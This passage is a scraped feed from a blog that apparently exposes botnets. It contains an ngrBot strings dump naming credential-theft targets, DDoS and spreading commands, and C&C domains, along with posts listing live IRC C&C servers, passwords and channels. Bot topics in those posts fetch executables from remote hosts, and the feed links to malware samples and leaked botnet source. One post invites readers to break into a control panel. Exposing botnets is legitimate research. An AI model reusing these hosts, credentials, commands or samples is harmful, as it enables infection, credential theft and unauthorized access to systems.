/>*4shared.com/login*<br />4shared<br />txtpass<br />txtuser<br />*txtpass=*<br />*netload.in/index*<br />Netload<br />*freakshare.com/login*<br />Freakshare<br />login_pass<br />*login_pass=*<br />*mediafire.com/*login*<br />Mediafire<br />*sendspace.com/login*<br />Sendspace<br />*megaupload.*/*login*<br />Megaupload<br />*depositfiles.*/*/login*<br />Depositfiles<br />userid<br />*signin.ebay*SignIn<br />eBay<br />*officebanking.cl/*login.asp*<br />OfficeBanking<br />*secure.logmein.*/*logincheck*<br />LogMeIn<br />session[password]<br />session[username_or_email]<br />*password]=*<br />*twitter.com/sessions<br />Twitter<br />txtPassword<br />txtEmail<br />*&txtPassword=*<br />*.moneybookers.*/*login.pl<br />Moneybookers<br />*runescape*/*weblogin*<br />Runescape<br />*dyndns*/account*<br />DynDNS<br />*&password=*<br />*no-ip*/login*<br />NoIP<br />*steampowered*/login*<br />Steam<br />quick_password<br />quick_username<br />username<br />*hackforums.*/member.php<br />Hackforums<br />email<br />*facebook.*/login.php*<br />Facebook<br />*login.yahoo.*/*login*<br />Yahoo<br />passwd<br />login<br />*passwd=*<br />*login.live.*/*post.srf*<br />Live<br />TextfieldPassword<br />TextfieldEmail<br />*TextfieldPassword=*<br />*gmx.*/*FormLogin*<br />*Passwd=*<br />Gmail<br />FLN-Password<br />FLN-UserName<br />*FLN-Password=*<br />*fastmail.*/mail/*<br />Fastmail<br />pass<br />user<br />*pass=*<br />*bigstring.*/*index.php*<br />BigString<br />screenname<br />*screenname.aol.*/login.psp*<br />password<br />loginId<br />*password=*<br />*aol.*/*login.psp*<br />Passwd<br />Email<br />*service=youtube*<br />*google.*/*ServiceLoginAuth*<br />YouTube<br />login_password<br />login_email<br />*login_password=*<br />*paypal.*/webscr?cmd=_login-submit*<br />PayPal<br />%s / ?%d HTTP/1.1<br />Host: %s<br />User-Agent: %s<br />Keep-Alive: 300<br />Connection: keep-alive<br />Content-Length: 42<br />POST<br />Mozilla/4.0<br />Connection: Close<br />X-a: b<br />\\.\PHYSICALDRIVE0<br />00100<br />SeShutdownPrivilege<br />NtShutdownSystem<br />This binary is invalid.<br />Main reasons:<br />- you stupid cracker<br />- you stupid cracker...<br />- you stupid cracker?!<br />ngrBot Error<br />shell32.dll<br />http<br />httpi<br />usbi<br />dnsapi.dll<br />DnsFlushResolverCache<br />http://%s/%s<br />http://%s/<br />HTTP<br />Host: <br />POST /%1023s<br />{%s|%s%s}%s<br />n%s{%s|%s%s}%s<br /><br><br />admin<br />isadmin<br />%s|%s|%s<br />[DNS]: Redirecting "%s" to "%s"<br />disabled<br />enabled<br />%s|%s<br />[Logins]: Cleared %d logins<br />#user<br />#admin<br />#new<br />removing<br />exiting<br />reconnecting<br />MOTD<br />bsod<br />disable<br />POP3 -> <br />FTP -> <br />[d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s)<br />dlds<br />http://<br />rebooting<br />[Login]: %s<br />[DNS]: Blocked %d domain(s) - Redirected %d domain(s)<br />[Speed]: Estimated upload speed %d KB/s<br />Software\Microsoft\Windows\CurrentVersion\Run<br />ngrBot<br />running<br />IPC_Check<br />shell\open\command=<br />shell\explore\command=<br />icon=shell32.dll,7<br />useautoplay=1<br />action=Open folder to view files<br />shellexecute=<br />[autorun]<br />.lnk<br />%windir%\system32\cmd.exe<br />&&%%windir%%\explorer.exe %%cd%%%s<br />/c "start %%cd%%RECYCLER\%s<br />RECYCLER<br />.inf<br />%s%s<br />\\.\%c:<br />%s\%s<br />%sautorun.tmp<br />%sautorun.inf<br />%c:\<br />gdkWindowToplevelClass<br />%0x.exe<br />comment-text<br />*bebo.*/c/home/ajax_post_lifestream_comment<br />bebo Lifestream<br />*bebo.*/c/profile/comment_post.json<br />bebo Comment<br />Message<br />*bebo.*/mail/MailCompose.jsp*<br />bebo Message<br />*friendster.*/sendmessage.php*<br />Friendster Message<br />comment<br />Friendster Comment<br />shoutout<br />*friendster.*/rpc.php<br />Friendster Shoutout<br />*vkontakte.ru/mail.php<br />vkontakte Message<br />*vkontakte.ru/wall.php<br />vkontakte Wall<br />message<br />*vkontakte.ru/api.php<br />vkontakte Chat<br />text<br />*twitter.*/*direct_messages/new*<br />Twitter Message<br />*twitter.*/*status*/update*<br />Twitter Tweet<br />status<br />*facebook.*/ajax/*MessageComposerEndpoint.php*<br />Facebook Message<br />msg_text<br />*facebook.*/ajax/chat/send.php*<br />Facebook IM<br />-_.!~*'()<br />Content-Length: <br />%s.%s hijacked!<br />MSG %d %s %d<br />MSG %d %1s<br />SDG %d %d<br />Reliability: <br />From: <br />Content-Length: %d<br />X-MMS-IM-Format: <br />SDG %d<br />bmsn<br />%s_0x%08X<br />RegCreateKeyExW<br />RegCreateKeyExA<br />URLDownloadToFileW<br />URLDownloadToFileA<br />PR_Write<br />DnsQuery_W<br />DnsQuery_A<br />InternetWriteFile<br />HttpSendRequestW<br />HttpSendRequestA<br />GetAddrInfoW<br />s3nd<br />CreateFileA<br />MoveFileW<br />MoveFileA<br />DeleteFileW<br />DeleteFileA<br />CopyFileW<br />CopyFileA<br />NtQueryDirectoryFile<br />NtEnumerateValueKey<br />%08x<br />OPEN<br />DnsFree<br />DnsQuery_A<br />DNSAPI.dll<br />FreeContextBuffer<br />InitializeSecurityContextW<br />FreeCredentialsHandle<br />DeleteSecurityContext<br />QueryContextAttributesW<br />AcquireCredentialsHandleW<br />EncryptMessage<br />DecryptMessage<br />InitializeSecurityContextA<br />ApplyControlToken<br />Secur32.dll<br />SHGetSpecialFolderPathW<br />SHGetFileInfoA<br />ShellExecuteA<br />SHELL32.dll<br />InternetCloseHandle<br />InternetReadFile<br />InternetQueryDataAvailable<br />HttpQueryInfoA<br />InternetOpenUrlA<br />InternetOpenA<br />HttpQueryInfoW<br />InternetQueryOptionW<br />WININET<br />.dll<br />PathAppendW<br />StrStrIA<br />PathAppendA<br />PathFindExtensionA<br />SHLWAPI.dll<br />WS2_32.dll<br />memset<br />wcsstr<br />strstr<br />wcsrchr<br />??3@YAXPAX@Z<br />atoi<br />sscanf<br />_strcmpi<br />printf<br />_snprintf<br />sprintf<br />strncpy<br />_memicmp<br />_wcsnicmp<br />_vsnprintf<br />_stricmp<br />strtok<br />strchr<br />_snwprintf<br />??2@YAPAXI@Z<br />_strnicmp<br />isxdigit<br />memmove<br />strncmp<br />toupper<br />strrchr<br />vsprintf<br />isalnum<br />strncat<br />MSVCRT.dll<br />lstrcpyA<br />MoveFileExA<br />lstrcmpA<br />WideCharToMultiByte<br />MoveFileExW<br />lstrcmpW<br />ExitThread<br />MultiByteToWideChar<br />GetFileAttributesA<br />SetFileAttributesW<br />GetFileAttributesW<br />LoadLibraryW<br />CloseHandle<br />SetFileTime<br />CreateFileW<br />GetFileTime<br />GetSystemTimeAsFileTime<br />WriteFile<br />GetModuleHandleW<br />GetLastError<br />ReadFile<br />GetTickCount<br />HeapAlloc<br />GetProcessHeap<br />HeapFree<br />lstrlenA<br />Sleep<br />WriteProcessMemory<br />ReadProcessMemory<br />InitializeCriticalSection<br />LeaveCriticalSection<br />EnterCriticalSection<br />HeapReAlloc<br />SetEvent<br />ConnectNamedPipe<br />CreateNamedPipeA<br />CreateEventA<br />DisconnectNamedPipe<br />GetOverlappedResult<br />WaitForMultipleObjects<br />CreateFileA<br />VirtualFreeEx<br />VirtualAllocEx<br />IsWow64Process<br />CreateRemoteThread<br />OpenProcess<br />WaitForSingleObject<br />ReleaseMutex<br />MapViewOfFile<br />OpenFileMappingA<br />CreateFileMappingA<br />InterlockedIncrement<br />UnmapViewOfFile<br />CreateMutexA<br />GetVersionExA<br />GetModuleFileNameW<br />InterlockedCompareExchange<br />CreateThread<br />GetWindowsDirectoryW<br />DeleteFileW<br />GetTempFileNameW<br />lstrcatW<br />lstrcpynW<br />DeleteFileA<br />SetFileAttributesA<br />lstrcpyW<br />LocalFree<br />LocalAlloc<br />lstrcpynA<br />SetFilePointer<br />DeviceIoControl<br />VirtualAlloc<br />CreateProcessW<br />ExitProcess<br />lstrcatA<br />GetVolumeInformationW<br />GetLocaleInfoA<br />FlushFileBuffers<br />CopyFileW<br />FindClose<br />FindNextFileA<br />FindFirstFileA<br />SetCurrentDirectoryA<br />LockFile<br />GetFileSize<br />CreateDirectoryA<br />GetLogicalDriveStringsA<br />OpenMutexA<br />GetModuleFileNameA<br />GetWindowsDirectoryA<br />KERNEL32.dll<br />MessageBoxA<br />wvsprintfA<br />wsprintfW<br />DefWindowProcA<br />DispatchMessageA<br />TranslateMessage<br />GetMessageA<br />RegisterDeviceNotificationA<br />CreateWindowExA<br />RegisterClassExA<br />USER32.dll<br />CryptGetHashParam<br />CryptDestroyHash<br />CryptHashData<br />CryptReleaseContext<br />CryptCreateHash<br />CryptAcquireContextA<br />AdjustTokenPrivileges<br />LookupPrivilegeValueA<br />OpenProcessToken<br />RegCloseKey<br />RegSetValueExW<br />RegCreateKeyExW<br />RegNotifyChangeKeyValue<br />RegSetValueExA<br />RegOpenKeyExA<br />ADVAPI32.dll<br />CoCreateInstance<br />CoInitialize<br />ole32.dll<br /> n;^<br />Qkkbal<br />i]Wb<br />9a&g<br />MGiI<br />wn>Jj<br />#.zf<br />+o*7<br />!!!!!!!!<br />@@@@@@@@@@@@@@@@@@@@@@<br />@@@@@@@@@<br />@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@""""""""""""""""<br />@@@@@@<br />@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@x<br />d.xludakx.com<br />MrDD<br />ab.0n3mmm.com<br />MrDD<br />pusikuracbre.com<br />MrDD<br />#darkfear##<br />redem<br />admin<br />1.1.0.0<br />MrDD<br />jkfdsfds67567dsf<br />NAZEL<br />NAZELup<br />KOSOMAKYAD<br />msn.set<br />msn.int<br />http.set<br />http.int<br />http.inj<br />mdns<br />stats<br />speed<br />logins<br />slow<br />ssyn<br />stop<br />{\XA<br />+|XA<br />54YA<br />Z<YA<br />k8WA<br />PASS %s<br />[.ShellClassInfo]<br />CLSID={645FF040-5081-101B-9F08-00AA002F954E}<br />USER %s 0 0 :%s<br />NICK %s<br />JOIN %s %s<br />PART %s<br />PRIVMSG %s :%s<br />QUIT :%s<br />PONG %s<br />PING<br />PRIVMSG<br />[v="%s" c="%s" h="%s" p="%S"]<br />[d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d<br />[d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d<br />[Slowloris]: Starting flood on "%s" for %d<br /> minute(s)<br />[Slowloris]: Finished flood on "%s"<br />[UDP]: Starting flood on "%s:%d" for %d second(s)<br />[UDP]: Finished flood on "%s:%d"<br />[SYN]: Starting flood on "%s:%d" for %d second(s)<br />[SYN]: Finished flood on "%s:%d"<br />[USB]: Infected %s<br />[MSN]: Updated MSN spread message to "%s"<br />[MSN]: Updated MSN spread interval to "%s"<br />[HTTP]: Updated HTTP spread message to "%s"<br />[HTTP]: Injected value is now %s.<br />[HTTP]: Updated HTTP spread interval to "%s"<br />[Visit]: Visited "%s"<br />[DNS]: Blocked "%s"<br />[usb="%d" msn="%d" http="%d" total="%d"]<br />[ftp="%d" pop="%d" http="%d" total="%d"]<br />[RSOCK4]: Started rsock4 on "%s:%d"<br />[RSOCK4]: Stopped rsock4<br />[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)<br />[d="%s"] Error downloading file [e="%d"]<br />[d="%s"] Error writing download to "%S" [e="%d"]<br />[d="%s" s="%d bytes"] Error creating process "%S" [e="%d"]<br />[d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"]<br />[d="%s"] Error getting temporary filename. [e="%d"]<br />[d='%s"] Error getting application data path [e="%d"]<br />[Visit]: Error visitng "%s"<br />[FTP Login]: %s<br />[POP3 Login]: %s<br />[FTP Infect]: %s was iframed<br />[HTTP Login]: %s<br />[HTTP Traffic]: %s<br />[Ruskill]: Detected File: "%s"<br />[Ruskill]: Detected DNS: "%s"<br />[Ruskill]: Detected Reg: "%s"<br />[PDef+]: %s<br />[DNS]: Blocked DNS "%s"<br />[MSN]: %s<br />[HTTP]: %s<br />ftplog<br />poplog<br />ftpinfect<br />httplogin<br />httptraff<br />ruskill<br />rdns<br />rreg<br />httpspread<br />http://api.wipmania.com/<br />\\.\pipe\%08x_ipc<br />0;0G0O0V0d0n0s0<br />1)13181Y1e1u1|1<br />2C2c2<br />3 363M3j3u3<br />6(6/686J6O6T6m6<br />7 7(7O7V7_7<br />7=8T8\8<br />9#9:9W9^9f9~9<br />98:R:[:<br />;U<e<j<p<<br /><g=o=<br />>*>N><br />?%?/?6?A?P?<br />0<0E0L0S0c0i0t0{0<br />2!3-4d4n4s4<br />5(5:5?5D5a5x5<br />6 6J6a6<br />7&7.7>7I7N7f7<br />1#2_2<br />8"8Q8X8g8q8<br />9':;:Y:<br /><'<1<H<X<x<<br />=%=7=D=K=Z=w=}=<br />>@>R>\>m><br />?1?<?B?j?<br />0g0g1<br />1"2Q2~2<br />203N3<br />424>4^4<br />8;9~9<br />:K:';A;_;<br /><4<><T<^<h<<br />=*=>=D=N=l=u=<br />>#>)>8>>>O>Y>^>p>u><br />?8?L?c?u?<br />0$1-1H1N1_1n1<br />313Y3k3<br />414l4<br />515B5P5u5<br />676V6_6f6v6<br />889Y9r9<br />:-:G:<br />;#;(;2;7;<;A;F;W;<br /><5<?<^<<br /><W=l=|=<br />=d>o>{><br />?/?U?`?p?<br />1P2T2X2<br />3?4a4h4<br />5A5H5|5<br />7U8]8f8}8<br />9'9-939q9<br />: :%:n:<br />;1;J;d;<br /><%<3<<<B<i<v<<br />=$=+=0===E=L=T=o=v=<br />=6>E><br />?%?4?\?<br />0'0K0\0s0x0}0<br />091M1g1t1<br />3[3q3<br />3*494<br />4-575w5~5<br />5B6L6<br />6(7I7]7z7<br />848_9m9w9<br />:+:1:7:D:Q:V:e:t:<br />; ;,;8;L;Q;V;n;s;x;};<br />;5<B<]<w<<br />=5===B=N=S=g=l=<br />5"6-6B6L6Q6c6u6<br />7 70767=7L7R7<br />94:{:<br />'010<br />1.1F1^1<br />2(2>2P2b2t2<br />4K5f5<br />6=6K6Y6<br />7*7/7L7S7r7<br />8]8i8<br />9+9;9A9G9d9q9w9}9<br />9/:b:h:<br />;!;S;`;h;s;<br />;E<e<w<<br />=.=<=A=F=L=R=k=u=<br />>#>,>X><br />?-?\?y?<br />42484T4`4f4<br />4X5]5|5<br />6-646D6Q6[6b6g6q6z6<br />9 9&9<9G9R9W9\9q9v9<br />9::G:M:b:j:z:<br />;.;6;;;B;H;S;c;k;<br /><+<F<T<`<<br />=3=E=Q=<br />>3>T>k>z><br />?Z?r?{?<br />%0<0V0h0<br />141>1l1<br />3g3r3<br />3\4c4<br />5*585R5w5<br />6!6<6R6a6<br />7=7C7T7g7z7<br />8-9L9w9<br />9-:D:W:<br />;#;4;:;T;Z;<br /><#<(<-<2<7<P<j<w<<br />=)=.=K=[=`=}=<br />>+>I>V>[>s>z><br />?*?H?T?a?g?u?<br />0,0J0Z0g0l0v0<br />1%101=1C1I1W1s1y1<br />2'212<2J2_2<br />3"3@3P3V3<br />4)4J4h4x4<br />535Q5s5<br />6!6.656D6S6`6m6z6<br />7?7E7<br />7'8,818[8w8<br />8.9K9V9s9<br />:':,:D:T:Y:r:<br />;2;7;W;r;w;|;<br /><$<5<<<F<N<b<<br />=(=I=O=Z=r=|=<br />>V>g>|><br />>#?h?<br />0-070D0x0<br />0@1G1<br />132D2Z2p2<br />3*343=3R3^3<br />3-434=4F5P5]5<br />536N6[6<br />637B7U7d7q7<br />818>8T8]8|8<br />9T9`9o9u9z9<br />:!:,:3:;:A:O:Y:f:l:r:<br />;(;3;9;?;Q;];c;i;{;<br /><&<3<8<G<T<Z<`<n<<br /><,=3=A=G=W=w=|=<br />>@>E>\><br />>W?`?<br />010C0H0M0a0f0k0<br />1 1$1<1M1U1<br />1-2O2z2<br />3I3Z3o3z3<br />4"4'4<4U4_4t4z4<br />575=5r5|5<br />6(6=6P6m6z6<br />7 767<7~7<br />8A8F8Y8c8j8<br />999C9<br />:%:,:3:=:F:e:<br />;+;=;D;X;];c;i;n;<br />;.<4<;<@<e<p<w<<br />="=*=0=;=F=O=Z=b=g=v={=<br />=7>N>W>]><br />>&?7?~?<br />40;0A0Q0a0<br />2)2A2[2<br />2T3]3f5<br />6F6Y6t6<br />7I7Y7_7e7k7q7w7}7<br />8*808;8~8<br />9 9O9X9^9<br />9$:0:Q:<br />:&;2;8;F;<br /><"<2<=<Q<W<i<<br />=$=*=4=:=E=K=S=e=<br />>;>I><br />?!?F?M?W?<br />1$1<1I1[1g1<br />2%2>2V2a2t2|2<br />373E3M3a3l3<br />3@4N4U4<br />5/565<5R5k5<br />666i6<br />7.7M7<br />8,818M8[8`8<br />8?9R9<br />:#:4:9:?:E:P:{:<br />;#;B;U;[;b;r;<br /><!<o<<br />=$=;=C=N=S=X=i=n=s=}=<br />>">(>.>4>:>@>F>L>R>X>^>d>j>p>v>|><br />?B?H?N?T?Z?`?f?l?r?x?~?<br />4 4$4(4,4044484<4@4D4H4L4P4T4X6\6`6h6l6p6t6x6|6<br />6X7b7f7p7t7~7<br />8 8$8(8,808H9T9`9l9x9<br />: :,:8:D:P:\:h:t:<br />;(;4;@;L;X;d;p;|;<br />< <$<(<,<0<4<8<<<@<D<H<L<P<T<X<\<`<d<h<l<p<t<x<|<<br />H5L5P5T5X5\5`5d5h5l5p5t5x5|5<br />6 6$6(6,6064686<6@6D6H6L6P6T6X6\6`6d6h6l6p6t6x6|6<br />7 7$7(7,7074787<7@7D7H7L7P7T7X7\7`7d7h7l7p7t7x7|7<br />8 8$8(8,8084888<8@8D8H8L8P8T8X8\8`8d8h8l8p8t8x8|8<br />9 9$9(9,9094989<9@9D9H9L9P9T9X9\9`9d9h9l9p9t9x9|9<br />: :`:l:x:<br />; ;(;,;0;8;<;@;H;L;P;X;\;`;h;l;p;x;|;<br />< <$<(<0<4<8<<<@<H<L<P<T<X<`<d<h<l<p<x<|<<br />= =$=(=,=0=8=<=@=D=H=P=T=X=\=`=h=l=p=t=x=<br />> >(>,>4>8>@>D>L>P>X>\>h>p>x><br /><br />Unicode Strings:<br />---------------------------------------------------------------------------<br />Ajjj<br />jjjj<br />jjjj<br />jjjj<br />$jjj<br />Ajjj<br />DBWIN<br />\\.\pipe<br />kernel32.dll<br />ntdll.dll<br />Internet Explorer\1explore.exe<br />autorun.inf<br />pidgin.exe<br />wlcomm.exe<br />msnmsgr.exe<br />msmsgs.exe<br />flock.ex<br />opera.exe<br />chrome.exe<br />ieuser.exe<br />1explore.exe<br />f1refox.exe<br />HKCU\<br />HKLM\<br />Microsoft Unified Security Protocol Provider<br />.ipconfig.exe<br />verclsid.exe<br />regedit.exe<br />rundll32.exe<br />cmd.exe<br />regsvr32.exe<br />l"%s" %S<br />POST<br />.exe<br />lol.exe<br />n127.0.0.1<br />%s:Zone.Identifier<br />wininet.dll<br />secur32.dll<br />ws2_32.dll<br />:%S%S\Desktop.ini<br />winlogon.exe<br />explorer.exe<br />Aadvapi32.dll<br />urlmon.dll<br />nspr4.dll<br />dnsapi.dll<br />Akernel23.dll<br />y%s\%s.exe<br />lsass.exe<br />Shell<br />Software\Microsoft\Windows\CurrentVersion\Run<br />Software\Microsoft\Windows\CurrentVersion\Policies\System<br />.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run<br /></code></pre><br /><br />hosting infos:<br />http://whois.domaintools.com/95.211.165.62<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2690706005301967154-6183406053528500643?l=www.exposedbotnets.com' alt='' /></div>Pighttp://www.blogger.com/profile/14894907939553492625noreply@blogger.com1tag:blogger.com,1999:blog-2690706005301967154.post-22776599045232171232012-01-17T18:25:00.000+01:002012-01-17T18:25:46.950+01:00193.107.16.22(irc botnet hosted in Seychelles Ideal Solution Ltd)Server:<br />193.107.16.22:8718<br /><br />nick:<br />pSLXmPY<br /><br />user:<br />wqvryekc<br /><br />chanel:<br />#c<br /><br />Now talking in #c<br />Topic On: [ #c ] [ =dOgdsa09MhlSUc9X89Kr0zVOWZeVEgEv3wA1/TshQtxNUaWqoxiIxkURBNl9r/5JGhteretdAQXvU1kBsZEpDZNZJfkv ]<br />Topic By: [ r ]<br /><br />hosting infos:<br />http://whois.domaintools.com/193.107.16.22<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2690706005301967154-2277659904523217123?l=www.exposedbotnets.com' alt='' /></div>Pighttp://www.blogger.com/profile/14894907939553492625noreply@blogger.com0tag:blogger.com,1999:blog-2690706005301967154.post-71474348798903051912012-01-17T18:10:00.000+01:002012-01-17T18:10:38.437+01:0080.79.112.66(ngrBot hosted in Estonia Tallinn Aktsiaselts Wavecom)Remote Host Port Number<br />109.68.190.217 80<br />199.15.234.7 80<br />80.79.112.66 5749 PASS axplm2<br /><br />NICK n{US|XPa}psbmdzo<br />USER psbmdzo 0 0 :psbmdzo<br />JOIN #chat Amx4k<br />PRIVMSG win7elite :[d="http://109.68.190.217/alms22.exe" s="150528 bytes"] Updated bot file "C:\Documents and Settings\UserName\Application Data\Scxaxs.exe" - Download retries: 0<br /><br />exe file:<br /><a href="http://4154afc9.seriousdeals.net">Download</a><br /><a href="http://www.crocko.com/8CDE18EDF2DA4D51976266A98F94A69F/alms22.exe">Download</a><br /><br />hosting infos:<br />http://whois.domaintools.com/80.79.112.66<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2690706005301967154-7147434879890305191?l=www.exposedbotnets.com' alt='' /></div>Pighttp://www.blogger.com/profile/14894907939553492625noreply@blogger.com0tag:blogger.com,1999:blog-2690706005301967154.post-31977322689132901162012-01-14T01:57:00.001+01:002012-01-14T02:03:49.156+01:0067Mb Malware SamplesThis package have alot of irc bot and banking trojans samples inside<br />have fun exploring samples<br /><br /><br /><a href="http://3f116a49.seriousdeals.net">Download</a><br /><a href="http://www.crocko.com/17B3E1130750450BA4220169EE2FF491/samples.zip">Download</a><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2690706005301967154-3197732268913290116?l=www.exposedbotnets.com' alt='' /></div>Pighttp://www.blogger.com/profile/14894907939553492625noreply@blogger.com1tag:blogger.com,1999:blog-2690706005301967154.post-23145111041862271642012-01-12T17:22:00.001+01:002012-01-12T17:23:26.389+01:00Virus.Win32.Nimnul.a( Malware hosted in United States Network Operations Center Inc)Hosted in USA also called Ramnit by other antiviruses<br />what this malware does:<br /><blockquote>Capability to send out email message(s) with the built-in SMTP client engine. <br />Produces outbound traffic. <br />Communication with a remote SMTP server and sending out email. <br />Downloads/requests other files from Internet. <br />Compromises SafeBoot registry key(s) in an attempt to disable the Safe Mode. <br />Creates a startup registry entry.</blockquote><br /><blockquote>The data identified by the following URLs was then requested from the remote web server:<br />http://mozilla.snt.utwente.nl/firefox/releases/9.0.1/win32/en-US/Firefox%20Setup%209.0.1.exe<br />http://96.9.139.213/stat2.php<br />http://96.9.139.213/stat1.php</blockquote><br />Here the panel:<br />http://96.9.139.213/ u have to find a way to gain access because it ask for username and passwd lol<br /><br />hosting infos:<br />http://whois.domaintools.com/96.9.139.213<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2690706005301967154-2314511104186227164?l=www.exposedbotnets.com' alt='' /></div>Pighttp://www.blogger.com/profile/14894907939553492625noreply@blogger.com0tag:blogger.com,1999:blog-2690706005301967154.post-89457433058533059212012-01-11T19:36:00.002+01:002012-01-11T19:36:53.669+01:0087.76.29.62(irc botnet hosted in United Kingdom Future Hosting Llc)Remote Host Port Number<br />199.15.234.7 80<br />87.76.29.62 4443<br /><br />NICK New{US-XP-x86}3443373<br />USER 3443373 "" "3443373" :3443373<br />MODE New{US-XP-x86}3443373 +iMm<br />JOIN #new<br />PONG 422<br /><br />hosting infos:<br />http://whois.domaintools.com/87.76.29.62<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2690706005301967154-8945743305853305921?l=www.exposedbotnets.com' alt='' /></div>Pighttp://www.blogger.com/profile/14894907939553492625noreply@blogger.com0tag:blogger.com,1999:blog-2690706005301967154.post-18409526373639758862012-01-11T19:14:00.000+01:002012-01-11T19:14:59.508+01:00119.59.99.160(irc botnet hosted in Thailand Bangkok 453 Ladplacout Jorakhaebua)Remote Host Port Number<br />119.59.99.160 2345<br /><br />NICK New[USA|00|P|98932]<br />PRIVMSG #!loco! :[M]: Thread Disabled.<br />PRIVMSG #!loco! :[M]: Thread Activated: Sending Message With Email.<br />USER XP-6625 * 0 :COMPUTERNAME<br />MODE New[USA|00|P|98932] -ix<br />JOIN #!loco!<br />PONG 22 MOTD<br /><br />Now talking in #!loco!<br />Topic On: [ #!loco! ] [ .m.s|.m.e Foto http://goo.gl/JfWS5?= ]<br />Topic By: [ wd11 ]<br /><br />hosting infos:<br />http://whois.domaintools.com/119.59.99.160<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2690706005301967154-1840952637363975886?l=www.exposedbotnets.com' alt='' /></div>Pighttp://www.blogger.com/profile/14894907939553492625noreply@blogger.com0tag:blogger.com,1999:blog-2690706005301967154.post-51766943201164340302012-01-10T22:51:00.000+01:002012-01-10T22:51:04.091+01:00timununyeri.co.cc(irc botnet hosted in Turkey Netinternet Bilgisayar Ve Telekomunikasyon San. Ve Tic. Ltd. Sti)timununyeri.co.cc 94.102.0.65<br /><br />Opened listening TCP connection on port: 113<br />C&C Server: 94.102.0.65:6667<br />Server Password: <br />Username: arpsc<br />Nickname: DEU|43304<br />Channel: #hack (Password: timu) <br />Channeltopic: :<br /><br />Now talking in #hack<br />Topic On: [ #hack ] [ .dl http://www.osmarimoveis-rs.com.br/ex.exe c:/ex.exe 1 ]<br />Topic By: [ infeCTeD ]<br /><br />hosting infos:<br />http://whois.domaintools.com/94.102.0.65<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2690706005301967154-5176694320116434030?l=www.exposedbotnets.com' alt='' /></div>Pighttp://www.blogger.com/profile/14894907939553492625noreply@blogger.com0tag:blogger.com,1999:blog-2690706005301967154.post-15511610455754081482012-01-10T20:37:00.000+01:002012-01-10T20:37:37.618+01:00174.140.165.107(irc botnet hosted in United States Portland Directspace Networks Llc)Remote Host Port Number<br />174.140.165.107 6667 PASS mystic<br /><br />NICK New{US-XP-x86}4733047<br />USER 4733047 "" "4733047" :4733047<br />MODE New{US-XP-x86}4733047 +iMm<br />JOIN #Boss<br />PONG :Mystical.gov<br /><br />hosting infos:<br />http://whois.domaintools.com/174.140.165.107<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2690706005301967154-1551161045575408148?l=www.exposedbotnets.com' alt='' /></div>Pighttp://www.blogger.com/profile/14894907939553492625noreply@blogger.com0tag:blogger.com,1999:blog-2690706005301967154.post-59020494694403162922012-01-10T19:53:00.004+01:002012-01-10T20:00:39.684+01:00vOlk HTTP Botnet - [+]Pharming ★ [ver 4.0] (VB Source)Another HTTP malware (currently for sell in heckers board)<br />Source leaked to public (have to say is very bad and VB language so u have to be a real hecker to spend 35$ for this garbage)<br />Source may be in handy to AV Companies lol<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://s18.postimage.org/l6tq4yk0p/Wolk_Botnet.png" imageanchor="1" style="margin-left:1em; margin-right:1em"><img border="0" height="240" width="102" src="http://s18.postimage.org/l6tq4yk0p/Wolk_Botnet.png" /></a></div><br /><br /><br />Download it <a href="http://www.secret-zone.net/threads/4212-vOlk-HTTP-Botnet-Pharming-★-ver-4-0-(VB-Source)?p=4569#post4569">here</a><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2690706005301967154-5902049469440316292?l=www.exposedbotnets.com' alt='' /></div>Pighttp://www.blogger.com/profile/14894907939553492625noreply@blogger.com1tag:blogger.com,1999:blog-2690706005301967154.post-88270590955996423362012-01-09T22:06:00.001+01:002012-01-09T22:16:14.067+01:00proxysafe.mrkva.su(irc botnet hosted in Netherlands Dediserv Dedicated Servers Sp. Z O.o)This is another reptile mod wich spreads better then ngrBot wich is more famous because being for sell around<br /><br />proxysafe.mrkva.su 212.7.214.43<br /><br />C&C Server: 212.7.214.43:2345<br />Server Password: <br />Username: x<br />Nickname: n[DEU|XP]7480782<br />Channel: #!proxy! (Password: ) <br />Channeltopic:<br /><br />exe file for analysis:<br /><br /><a href="http://c9e19b1b.tinylinks.co">Download</a><br /><a href="http://909d6e97.urlbeat.net">Download1</a><br /><a href="http://2ab9223e.theseblogs.com">Download2</a><br /><br />hosting infos:<br />http://whois.domaintools.com/212.7.214.43<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2690706005301967154-8827059095599642336?l=www.exposedbotnets.com' alt='' /></div>Pighttp://www.blogger.com/profile/14894907939553492625noreply@blogger.com0tag:blogger.com,1999:blog-2690706005301967154.post-16039151537955981502012-01-08T01:11:00.005+01:002012-01-08T02:30:46.112+01:00ColdSeal 5.4.1 Ultimate Release--FWB++ CRACKEDAbout the "coder"<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-cA7t3mEyJTU/TwjbwjeJgLI/AAAAAAAAAKs/8m-wQQfLiP8/s1600/AboutColdSealCODER.png" imageanchor="1" style="margin-left:1em; margin-right:1em"><img border="0" height="150" width="200" 